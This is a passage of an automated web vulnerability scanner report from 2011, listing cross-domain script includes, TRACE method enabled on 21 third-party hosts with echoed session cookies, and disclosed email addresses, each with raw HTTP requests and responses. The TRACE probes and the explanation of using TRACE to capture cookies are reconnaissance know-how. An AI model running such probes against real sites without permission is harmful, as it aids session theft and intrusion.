...[SNIP]...

16.72. http://www.whitefence.com/category/television-service/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.whitefence.com
Path:   /category/television-service/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /category/television-service/ HTTP/1.1
Host: www.whitefence.com
Proxy-Connection: keep-alive
Referer: http://www.whitefence.com/category/home-phone/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=7mgkb57jloi23h6h58j84sq2b4; _vis_opt_s=1%7C; _vis_opt_test_cookie=1; s_cc=true; __utma=218834399.1875876376.1315327922.1315327922.1315327922.1; __utmb=218834399.1.10.1315327922; __utmc=218834399; __utmz=218834399.1315327922.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=telephone%20service; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:59:27 GMT
Server: Apache
Vary: *
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html
Content-Length: 29242

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<
...[SNIP]...
<meta name="google-site-verification" content="p2XZph2E52nUsdioUNHg56J1Qa5oNYY8AmcLs_Veju8" />

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.5.2/build/yuiloader-dom-event/yuiloader-dom-event.js&2.5.2/build/selector/selector-beta-min.js"></script>
...[SNIP]...

17. TRACE method is enabled
There are 21 instances of this issue:

Issue description

The TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests which use the TRACE method by echoing in its response the exact request which was received.

Although this behaviour is apparently harmless in itself, it can sometimes be leveraged to support attacks against other application users. If an attacker can find a way of causing a user to make a TRACE request, and can retrieve the response to that request, then the attacker will be able to capture any sensitive data which is included in the request by the user's browser, for example session cookies or credentials for platform-level authentication. This may exacerbate the impact of other vulnerabilities, such as cross-site scripting.

Issue remediation

The TRACE method should be disabled on the web server.


17.1. http://40.xg4ken.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://40.xg4ken.com
Path:   /

Request

TRACE / HTTP/1.0
Host: 40.xg4ken.com
Cookie: 16bca7a18b4d6058

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:51:53 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: 40.xg4ken.com
Cookie: 16bca7a18b4d6058; kenshoo_id=200d2a28-23e9-a048-8372-00005235d564


17.2. http://ads.media.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.media.net
Path:   /

Request

TRACE / HTTP/1.0
Host: ads.media.net
Cookie: a612680ee2f88284

Response

HTTP/1.0 200 OK
Date: Tue, 06 Sep 2011 12:45:18 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: ads.media.net
Cookie: a612680ee2f88284


17.3. http://gdyn.pgatour.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://gdyn.pgatour.com
Path:   /

Request

TRACE / HTTP/1.0
Host: gdyn.pgatour.com
Cookie: d7374c72105c17d3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:50:31 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: gdyn.pgatour.com
Cookie: d7374c72105c17d3; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true


17.4. http://integrate.112.2o7.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://integrate.112.2o7.net
Path:   /

Request

TRACE / HTTP/1.0
Host: integrate.112.2o7.net
Cookie: f3f08c0dcbf6d7c9

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:50:43 GMT
Server: Omniture DC/2.0.0
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: integrate.112.2o7.net
Cookie: f3f08c0dcbf6d7c9; s_vi_x60bafx7Bzx7Djx21x7Cax7Fncc=[CS]v4|272F18FF05010599-4000010960230D66|4E5E718E[CE]; s_vi_ax60sji=[CS]v4|272FD7BC85162345-400001A0C03A9C55|4E5FAF78[CE]; s_vi_efhcjygdx7Fx7Fn=[CS]v4|273164FE850113D
...[SNIP]...

17.5. https://login.aptela.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.aptela.com
Path:   /

Request

TRACE / HTTP/1.0
Host: login.aptela.com
Cookie: 4ac389a7cf04b187

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:26:37 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: login.aptela.com
Cookie: 4ac389a7cf04b187; __utmx_k_180787838=1; __utmx=207344579.; __utmxx=207344579.; __utmc=207344579; _mkto_trk=id:533-RGZ-601&token:_mch-aptela.com-1315327921949-36615; tsa1v784=uvid54f3722f72cf13ba4e964afc25de508921958;
...[SNIP]...

17.6. http://mi.adinterax.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mi.adinterax.com
Path:   /

Request

TRACE / HTTP/1.0
Host: mi.adinterax.com
Cookie: 54786a97101eaf9e

Response

HTTP/1.1 200 OK
Server: Footprint 4.6/FPMCP
Mime-Version: 1.0
Date: Tue, 06 Sep 2011 12:44:47 GMT
Content-Type: message/http
Content-Length: 164
Expires: Tue, 06 Sep 2011 12:44:47 GMT
Connection: close

TRACE / HTTP/1.0
Host: mi.adinterax.com
Cookie: 54786a97101eaf9e; adxid=01345f4e62cacd40; adxf=696749@1@221.3078081@1@223
_FP_X_URL: http://mi.adinterax.com/


17.7. http://optimized-by.rubiconproject.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /

Request

TRACE / HTTP/1.0
Host: optimized-by.rubiconproject.com
Cookie: e4ca4145da2fcbb6

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:45:53 GMT
Server: RAS/1.3 (Unix)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: e4ca4145da2fcbb6; put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_1523=NPgmRuqc1g
...[SNIP]...

17.8. http://pixel.everesttech.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.everesttech.net
Path:   /

Request

TRACE / HTTP/1.0
Host: pixel.everesttech.net
Cookie: 6907e5a0bca27aa

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:48:10 GMT
Server: Apache
Vary: X-EF-Forwarded-For
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: pixel.everesttech.net
Cookie: 6907e5a0bca27aa; gglck=zqROZUBXyFQAAIdR; everest_g_v2=g_surferid~zqROZUBXyFQAAIdR; everest_session_v2=AXNOZhaIGXMAAIM3
Connection: Keep-Alive
X-EF-Forwarded-For: 50.23.123.106


17.9. http://pixel.fetchback.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.fetchback.com
Path:   /

Request

TRACE / HTTP/1.0
Host: pixel.fetchback.com
Cookie: 21821bfc4e605b93

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:05 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: pixel.fetchback.com
Cookie: 21821bfc4e605b93; opt=1; cmp=1_1315309925; uid=1_1315309925_1315309925595:3279793012126635; kwd=1_1315309925; sit=1_1315309925; cre=1_1315309925; bpd=1_1315309925; apd=1_1315309925; scg=1_1315309925; ppd=1_1315309925;
...[SNIP]...

17.10. http://sensor2.suitesmart.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sensor2.suitesmart.com
Path:   /

Request

TRACE / HTTP/1.0
Host: sensor2.suitesmart.com
Cookie: b93c6c2430fd9c08

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:44:50 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: sensor2.suitesmart.com
Cookie: b93c6c2430fd9c08; G15740=C1S104345-1-0-0-0-1314814746-0; spass=a1bfb027540676fe37eda0dd3047b05c; G15493=C1S99917-2-0-0-0-1315313090-0


17.11. http://show.partners-z.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://show.partners-z.com
Path:   /

Request

TRACE / HTTP/1.0
Host: show.partners-z.com
Cookie: 3270cf3a9ec9f534

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:49:54 GMT
Server: Apache/2.2.9 (Debian)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: show.partners-z.com
Cookie: 3270cf3a9ec9f534


17.12. http://sitesearch.comcast.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitesearch.comcast.com
Path:   /

Request

TRACE / HTTP/1.0
Host: sitesearch.comcast.com
Cookie: f1ac992ed3256afd

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:22:13 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: sitesearch.comcast.com
Cookie: f1ac992ed3256afd; UCID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; mbox=session#1315327839174-766376#1315330223|check#true#1315328423; s_pers=%20s_cpm%3D%255B%255B'Keyword'%252C'1315327839972'%255D%255D%7C1473180639972%3B%2
...[SNIP]...

17.13. http://support.aptela.com:9000/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://support.aptela.com:9000
Path:   /

Request

TRACE / HTTP/1.0
Host: support.aptela.com
Cookie: 9e61a8560151be49

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:26:49 GMT
Server: Apache/2.0.55 (Ubuntu) mod_jk/1.2.20 PHP/5.1.2 mod_ssl/2.0.55 OpenSSL/0.9.8a
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: support.aptela.com
Cookie: 9e61a8560151be49; __utmx_k_180787838=1; __utmx=207344579.; __utmxx=207344579.; __utmc=207344579; _mkto_trk=id:533-RGZ-601&token:_mch-aptela.com-1315327921949-36615; tsa1v784=uvid54f3722f72cf13ba4e964afc25de508921958;
...[SNIP]...

17.14. http://www.aptela.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aptela.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.aptela.com
Cookie: 7fec44a8bea380ad

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:51:59 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.aptela.com
Cookie: 7fec44a8bea380ad


17.15. http://www.fairpoint.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fairpoint.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.fairpoint.com
Cookie: 25330e177d2c95be

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:56:20 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_jk/1.2.23
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.fairpoint.com
Cookie: 25330e177d2c95be; JSESSIONID=24578CF2F7156AB48FCFDA58BB99F9A0


17.16. http://www.myfitv.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myfitv.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.myfitv.com
Cookie: cfb275e8afb9ea15

Response

HTTP/1.1 200 OK
Content-Type: message/http
Date: Tue, 06 Sep 2011 12:29:51 GMT
Server: Apache/2.2.11 (Ubuntu) Phusion_Passenger/3.0.4
Content-Length: 397
Connection: Close

TRACE / HTTP/1.1
host: www.myfitv.com
Cookie: cfb275e8afb9ea15; fitvuser=fitvuser_etiamsodalesorciat; _frontiertv_session=BAh7ByIOcmV0dXJuX3RvIh4vcG9ydGFsL3JlY2VudF90dl9lbGFzdGljIg9zZXNzaW9uX2lkIiU0YmU1YTM3MTJhNTEzNTZlOTc2N2FkZTBmZDgwZDUwOA%3D%3D--c52e71f8ca5af51
...[SNIP]...

17.17. http://www.ooma.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ooma.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.ooma.com
Cookie: 6322ae4c5c835d21

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:03 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.ooma.com
Cookie: 6322ae4c5c835d21; SESS7755cd8bc8424ab1d27f14d04d5a5a56=npu0136i2olrdchgh3cn570or2


17.18. http://www.pgatour.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pgatour.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.pgatour.com
Cookie: 71c845dccd1e506f

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:50:27 GMT
Server: Apache
Content-Type: message/http
Connection: close

TRACE / HTTP/1.1
Host: www.pgatour.com
Cookie: 71c845dccd1e506f
X-Forwarded-For: 50.23.123.106
X-Forwarded-Host: www.pgatour.com
X-Forwarded-Server: www.pgatour.com
Connection: Keep-Alive


17.19. http://www.vonage.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vonage.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.vonage.com
Cookie: 4382ceb9ad7df18a

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:07 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.vonage.com
Cookie: 4382ceb9ad7df18a


17.20. http://www.whitefence.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.whitefence.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.whitefence.com
Cookie: dd6ec2cc4aabe83a

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:51:56 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: dd6ec2cc4aabe83a; PHPSESSID=7mgkb57jloi23h6h58j84sq2b4
Host: www.whitefence.com


17.21. http://www2.whitefence.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.whitefence.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www2.whitefence.com
Cookie: 231d4e53f578ac0a

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:02:31 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: 231d4e53f578ac0a; _vis_opt_s=1%7C; _vis_opt_test_cookie=1; s_cc=true; s_sq=%5B%5BB%5D%5D; __utma=144480567.1743052426.1315328378.1315328378.1315328378.1; __utmb=144480567.1.10.1315328378; __utmc=144480567; __utmz=1444
...[SNIP]...

18. Email addresses disclosed
There are 51 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


18.1. http://autos.yahoo.com/bentley/continental-gtc/2011/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://autos.yahoo.com
Path:   /bentley/continental-gtc/2011/

Issue detail

The following email address was disclosed in the response:

Request

GET /bentley/continental-gtc/2011/ HTTP/1.1
Host: autos.yahoo.com
Proxy-Connection: keep-alive
Referer: http://autos.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxid=016e3b4e6615bdb5; AutosBH=bh=W1siMjAxMTA5MDZfMDU6NDU6NDIiLCJhdXRvcy55YWhvby5jb21cL2RhcmxhXC9tZC5waHA_ZW49dXRmLTgiXSxbIjIwMTEwOTA2XzA1OjQ1OjQwIiwiYXV0b3MueWFob28uY29tXC9kYXJsYVwvZmMucGhwP2NiPVlBSE9PLmFkcy5kYXJsYS5fbG9hZGVkJmFtcDtwPWF1dG9zJmFtcDtmPTk2NDMyOTAwJmFtcDtsPUxSRUMmYW1wO2VuPXV0Zi04JmFtcDtucHY9MSZhbXA7cm49MTMxNTMzMTE0MDc3MyZhbXA7ZW09JTdCJTIyc2l0ZS1hdHRyaWJ1dGUlMjIlM0ElMjJjb250ZW50JTNEJTI3YXV0b3NjaCUzRCUyMiUyMiUyMGNvbnRlbnQlM0QlMjJBbGwlMjBDYXJzJTNCJTIyJTI3JTIyJTdEJmFtcDt0X2U9MSZhbXA7LmludGw9dXMiXV0-&ver=1; adxf=3078081@1@223.1071929@2@223; BA=ba=4&ip=50.23.123.106&t=1315331160

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:47:59 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Cache-Control: private
Age: 3
Server: YTS/1.19.5
Proxy-Connection: keep-alive
Content-Length: 90155

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US">
<head>
<meta http-equiv="Content-Type" conte
...[SNIP]...
on Facebook","YGSH_FACEBOOK_URL":"http:\/\/www.facebook.com\/share.php?u=","YGSH_FAILED_PREREQS":"failed loading prerequisites","YGSH_FROM":"From:","YGSH_FROM_ERROR":"Re-enter your email address (e.g. yourname@example.com).","YGSH_FROM_REQUIRED":"Enter your email address.","YGSH_GOOGLE":"Google Bookmarks","YGSH_GOOGLE_HREF":"http:\/\/www.google.com\/bookmarks\/mark?op=edit","YGSH_GOOGLE_TITLE":"Bookmark this story","YG
...[SNIP]...

18.2. http://forums.comcast.com/html/js/s_code.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.comcast.com
Path:   /html/js/s_code.js

Issue detail

The following email address was disclosed in the response:

Request

GET /html/js/s_code.js HTTP/1.1
Host: forums.comcast.com
Proxy-Connection: keep-alive
Referer: http://forums.comcast.com/t5/Customer-Service/GamePass-cancellation-and-e-mail-response-times/m-p/779431
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UCID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; bn_u=6923713561343025788; SC=RC.USID=affb48c8-12df-45e7-aa6c-841fefd17445&SegmentationMode=TargusA; mbox=session#1315327839174-766376#1315331754|PC#1315327839174-766376.19#1316539494|check#true#1315329954; fsr.a=1315329894622; fsr.s={"v":1,"pv":7,"lc":{"d0":{"v":7,"s":true,"e":1}},"sd":0,"cp":{"CustomerID":"86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9"}}; s_pers=%20s_cpm%3D%255B%255B'Keyword'%252C'1315327839972'%255D%252C%255B'Direct%252520Load'%252C'1315329734689'%255D%255D%7C1473182534689%3B%20s_v5%3D%255B%255B'xss'%252C'1315329734677'%255D%252C%255B'internet%252520phone'%252C'1315329871911'%255D%255D%7C1473182671911%3B%20s_dfa%3Dcomcastdotcomprod%7C1315331694799%3B%20gpv_07%3Dcorporate%2520-%2520learn%2520-%2520xfinity%2520-%2520wireless-mobile-broadband%2520%7C1315331694819%3B; s_sess=%20_dr%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253Dutf-8%2526q%253Dtelephone%252Bservice%3B%20cf%3D0%3B%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20ev41%3Dinternet%2520phone%3B%20stc18%3Dinternet%2520phone%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; VISITORID=2086762009; LiSESSIONID=52B4547347B0428CE9D783866B22AFED

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:24:54 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8b
Accept-Ranges: bytes
ETag: W/"18416-1312362512000"
Last-Modified: Wed, 03 Aug 2011 09:08:32 GMT
Vary: Accept-Encoding
Content-Length: 18416
Connection: close
Content-Type: text/javascript

/* SiteCatalyst code version: H.17.
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com */

var s_account="comcastsupportforumsdev"
var s=s_gi(s_account)
/*********
...[SNIP]...
hav()+q+(qs?qs:s."
+"rq(^C)),0,id,ta);qs`e;`Wm('t')`5s.p_r)s.p_r(`R`X`e}^7(qs);^z`p(@i;`l@i`L^9,`G$71',vb`R@G=^D=s.`N`i=s.`N^M=`F@0^y=s.ppu=^p=^pv1=^pv2=^pv3`e`5$x)`F@0@G=`F@0eo=`F@0`N`i=`F@0`N^M`e`5!id@Ls.tc#Ctc=1;s.f"
+"lush`a()}`2$m`Atl`0o,t,n,vo`1;s.@G=@wo`R`N^M=t;s.`N`i=n;s.t(@i}`5pg){`F@0co`0o){`K@J\"_\",1,#B`2@wo)`Awd@0gs`0$S{`K@J$p1,#B`2s.t()`Awd@0dc`0$S{`K@J$p#B`2s.t()}}@3=(`F`J`Y`8`4@us@d0`Rd=^L
...[SNIP]...

18.3. http://games.frontier.com/BodyScripts.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://games.frontier.com
Path:   /BodyScripts.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /BodyScripts.aspx HTTP/1.1
Host: games.frontier.com
Proxy-Connection: keep-alive
Referer: http://games.frontier.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 75424
Cache-Control: private, max-age=14400
Date: Tue, 06 Sep 2011 12:45:27 GMT
Connection: close

//::: jQuery
/*
* jQuery JavaScript Library v1.3.2
* http://jquery.com/
*
* Copyright (c) 2009 John Resig
* Dual licensed under the MIT and GPL licenses.
* http://docs.jquery.com/License

...[SNIP]...
<iacobs@m0n5t3r.info>
...[SNIP]...

18.4. http://games.frontier.com/game.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://games.frontier.com
Path:   /game.htm

Issue detail

The following email address was disclosed in the response:

Request

GET /game.htm?code=119282623&lc=en&channel=110464377 HTTP/1.1
Host: games.frontier.com
Proxy-Connection: keep-alive
Referer: http://games.frontier.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=oberonfrontier%3D%2526pid%253DhomePage%2526pidt%253D1%2526oid%253Dhttp%25253A//games.frontier.com/game.htm%25253Fcode%25253D119282623%252526lc%25253Den%252526channel%25253D110464377%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 91941
Cache-Control: private, max-age=0
Expires: Tue, 06 Sep 2011 12:50:48 GMT
Date: Tue, 06 Sep 2011 12:50:48 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...
<a id="Gid83" class="linkgizmo gameinfolink1 first odd" href="mailto:review@oberon-media.com?Subject=Mystery Age: Imperial Staff">
...[SNIP]...

18.5. http://l.yimg.com/a/combo

Summary

Severity:   Information
Confidence:   Certain
Host:   http://l.yimg.com
Path:   /a/combo

Issue detail

The following email address was disclosed in the response:

Request

GET /a/combo?omg/js/omg-main-2.1.1.js&omg/js/menu-1.1.0.js&omg/js/deferloader-1.0.0.js HTTP/1.1
Host: l.yimg.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 01:16:03 GMT
Cache-Control: public, max-age=315360000
Expires: Fri, 03 Sep 2021 01:16:03 GMT
Vary: Accept-Encoding
Content-Type: application/x-javascript
Age: 41359
Content-Length: 86727
Proxy-Connection: keep-alive
Server: YTS/1.19.5

/* yahoo-dom-event
Copyright (c) 2007, Yahoo! Inc. All rights reserved.
Code licensed under the BSD License:
http://developer.yahoo.net/yui/license.txt
version: 2.4.1
*/
if(typeof YAHOO=="undefined"||
...[SNIP]...
<meaghan@yahoo-inc.com>
...[SNIP]...

18.6. http://landing.optionshouse.com/rate/395/yhofin/qbttn/stk_oldgb/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://landing.optionshouse.com
Path:   /rate/395/yhofin/qbttn/stk_oldgb/

Issue detail

The following email address was disclosed in the response:

Request

GET /rate/395/yhofin/qbttn/stk_oldgb/?utm_source=yhofin&utm_medium=paid-banner-ads&utm_campaign=120x60-QuotesBttn&utm_content=stock:oldGrnBlk HTTP/1.1
Host: landing.optionshouse.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N6067.160910.7443114402621/B5129127.36;sz=120x60;dcopt=rcl;mtfIFPath=nofile;click=http://global.ard.yahoo.com/SIG=15srre13t/M=601454399.602194378.673385551.687570551/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=sGXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=2892168919546073312/R=1/X=3/*;ord=1315313295039208?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: LiveBall=uid=699982&uky=G2W1TS8H&rid=764602; domain=optionshouse.com; expires=Wed, 05-Sep-2012 05:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:47:14 GMT
Content-Length: 14053


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">

<head id="ball_page_ti
...[SNIP]...
